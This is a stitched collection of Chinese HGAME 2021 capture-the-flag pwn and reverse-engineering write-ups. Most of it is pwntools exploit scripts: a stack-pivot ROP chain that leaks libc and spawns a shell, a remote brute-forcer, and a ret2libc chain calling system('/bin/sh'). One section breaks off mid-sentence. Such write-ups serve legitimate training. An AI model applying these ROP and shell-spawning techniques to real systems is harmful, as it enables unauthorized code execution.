HGAME2021-WEEK3-PWN-WP
blackgive
栈迁移
exp
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(log_level = 'debug')
context.terminal = ['tmux','splitw','-h']
# Local process is used here; the remote() line is kept as a placeholder with an empty host.
sh = process("./blackgive")
#sh = remote("")
# libc shipped with the challenge (version is encoded in the file name) plus the target ELF.
libc = ELF("./libc6_2.27-3ubuntu1.4_amd64.so")
elf = ELF("./blackgive")
# Hard-coded addresses; none of these are resolved from `elf` at runtime.
pop_rdi_ret = 0x400813
bss_base = 0x6010A0
off = 0xA0
# Stage 1: 'paSsw0rd' zero-padded to 0x20 bytes, followed by two 8-byte little-endian values.
payload = 'paSsw0rd'.ljust(0x20,'\x00')
payload += p64(bss_base + off - 0x8) + p64(0x4007A3)
sh.recvuntil("password:")
#gdb.attach(proc.pidof(sh)[0])
sh.send(payload)
# Stage 2: `off` NUL bytes, then pop rdi / puts@GOT / puts@PLT / 0x40070a as 8-byte values.
payload = '\x00' * off + p64(pop_rdi_ret) + p64(elf.got['puts']) + p64(elf.sym['puts']) + p64(0x40070a)
sh.sendlineafter("!\n",payload)
# Read the printed pointer up to the newline and NUL-pad it to 8 bytes for u64().
puts_addr = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))
libc_base = puts_addr - libc.sym['puts']
# Stage 3: same padded password prefix, then 0 and libc_base + 0x4f432 (offset is hard-coded).
payload = 'paSsw0rd'.ljust(0x20,'\x00')
payload += p64(0) + p64(libc_base + 0x4f432)
sh.sendafter("password:",payload)
sh.interactive()
without_leak
64 位 ret2dl-resolve 裸题。由于输出流都被关闭,所以无法实现 leak,考虑进行 ret2dl-resolve。由于提供了 libc,考虑通过伪造 link_map 结构体 getshell。打本地的时候,即便打通了也会有

HGAME-WEEK2-WP
RE
fake_debugger beta
没搞懂,不同位置的不同字符对应的编码都不同,没什么思路,写了个脚本爆破了
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#context(log_level = 'debug')
# Candidate alphabet: all 94 printable ASCII characters except the space, in the
# author's order (digits, lower case, upper case, then punctuation).
total_char = (
    '1234567890'
    'abcdefghijklmnopqrstuvwxyz'
    'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    '-_=+|/?.>,<:;"\'\\`~!@#$%^&*(){}[]'
)
def test(flag_now):
    """Submit *flag_now* to the remote checker and return the integer it reports after 'eax: '.

    The candidate is sent at the "now!" prompt, then 2 * len(flag_now)
    "---" prompts are each answered with a single space before the
    'eax: ' line is read. The connection is closed before returning.
    """
    conn = remote("101.132.177.131", 9999)
    conn.sendlineafter("now!\n", flag_now)
    prompts = 2 * len(flag_now)
    for _ in range(prompts):
        conn.sendlineafter("---\n", ' ')
    conn.recvuntil('eax: ')
    value = int(conn.recvuntil("\n"))
    conn.close()
    return value
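def get_next(flag_now):
    """Submit *flag_now* + 'a' to the remote checker and return the integer it reports after 'ebx: '.

    The extended candidate is sent at the "now!" prompt, then
    2 * len(flag_now) + 2 "---" prompts are each answered with a single
    space before the 'ebx: ' line is read.

    Unlike the original, the connection is always closed (via try/finally),
    so the brute-force loop that calls this once per character does not
    leak one socket per iteration.
    """
    sh = remote("101.132.177.131", 9999)
    try:
        sh.sendlineafter("now!\n", flag_now + 'a')
        for _ in range(2 * len(flag_now) + 2):
            sh.sendlineafter("---\n", ' ')
        sh.recvuntil('ebx: ')
        return int(sh.recvuntil("\n"))
    finally:
        sh.close()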
flag = 'hgame{You_Kn0w_debuG'
# Extend the known prefix one character at a time until the closing brace is reached.
while flag[-1] != '}':
    # Checker value -> candidate character. If two candidates produce the same
    # value, the later one in total_char wins (plain dict assignment).
    mapping = {test(flag + candidate): candidate for candidate in total_char}
    # A KeyError here means no candidate reproduced the value get_next() reported.
    flag += mapping[get_next(flag)]
    print(flag)
print(flag)
分了几次爆破,所以这个脚本的起点就几乎是 flag 了

HGAME2021-WEEK2-PWN-WP
rop_primary
没什么难度,就是单纯的 ROP
#!/usr/bin/env python
# coding=utf-8
from pwn import *
from LibcSearcher import *
import re
elf = ELF("./rop_primary")
# Hard-coded gadget addresses; they are not looked up via `elf` at runtime.
pop_rdi_ret = 0x401613
pop_rsi_r15_ret = 0x401611  # defined but not used by the chains further down
pop_r14_r15_ret = 0x401610
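def matrixMul(A, B):
    """Return the product A x B as a list of rows of ints.

    A and B are lists of rows whose entries may be ints or numeric strings;
    every entry is coerced with int() before multiplying, as in the original.
    The result has len(A) rows and len(B[0]) columns.

    Raises ValueError when either matrix is empty or the inner dimensions
    (len(A[0]) vs len(B)) disagree. The original silently returned None in
    that case, which only surfaced later as a TypeError at the call site.
    """
    if not A or not B or len(A[0]) != len(B):
        raise ValueError("matrixMul: inner dimensions do not match")
    # Columns of B, so each output entry is a plain dot product of a row and a column.
    cols_b = list(zip(*B))
    return [
        [sum(int(a) * int(b) for a, b in zip(row, col)) for col in cols_b]
        for row in A
    ]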
def _read_rows(tube, terminator):
    """Read lines from *tube* until one equals *terminator*; return the rows before it.

    Each preceding line is split into its numeric tokens (integers or
    decimals) with re.findall; the terminator line is consumed and dropped.
    """
    rows = []
    while True:
        line = tube.recvuntil("\n", drop=True)
        if line == terminator:
            return rows
        rows.append(re.findall(r"\d+\.?\d*", line))


sh = remote("159.75.104.107", 30372)
sh.recvuntil("A:\n")
# The service prints matrix A, the line "B:", matrix B, then the "a * b = ?" prompt.
matA = _read_rows(sh, 'B:')
matB = _read_rows(sh, 'a * b = ?')
matAns = matrixMul(matA, matB)
print(matAns)
# Answer with every product entry on its own line, row by row.
for row in matAns:
    for value in row:
        sh.sendline(str(value))
sh.recvuntil("best\n")
# First chain: 0x38 bytes of filler, then pop rdi / puts@GOT / puts / 0x40157B.
payload = 'a' * 0x30 + 'b' * 8
payload += p64(pop_rdi_ret) + p64(elf.got['puts']) + p64(elf.symbols["puts"]) + p64(0x40157B)
sh.sendline(payload)
# Six bytes of the printed pointer, NUL-padded to 8 for u64().
leak_addr = u64(sh.recv(6).ljust(8, '\x00'))
log.success("addr:" + hex(leak_addr))
libc = LibcSearcher('puts', leak_addr)
libc_base = leak_addr - libc.dump("puts")
log.success("libc_base:" + hex(libc_base))
system_addr = libc_base + libc.dump("system")
bin_sh_addr = libc_base + libc.dump('str_bin_sh')
# Second chain: same filler, pop r14/r15 with two zeros, then pop rdi / "/bin/sh" / system.
payload = 'a' * 0x30 + 'b' * 8
payload += p64(pop_r14_r15_ret) + p64(0) * 2
payload += p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr)
sh.sendlineafter('best\n', payload)
sh.interactive()
写完exp打远程的时候发现搜不出来 libc,考虑是 libc-database 版本过低,然后尝试更新,但是 libc-database 本身是装 LibcSearcher 的时候一起装的,可能安装的时候有点问题,get 脚本用不来,所以只好整个 libc-database 删掉重装,重新 get,家里的带宽确实比较小,整个更新大概花了半个多小时,再加上更新的时候干别的事情去了差点把这题忘了,所以很晚才打通,但是运气还算不错,抢到了一血,只比二血早了30秒
…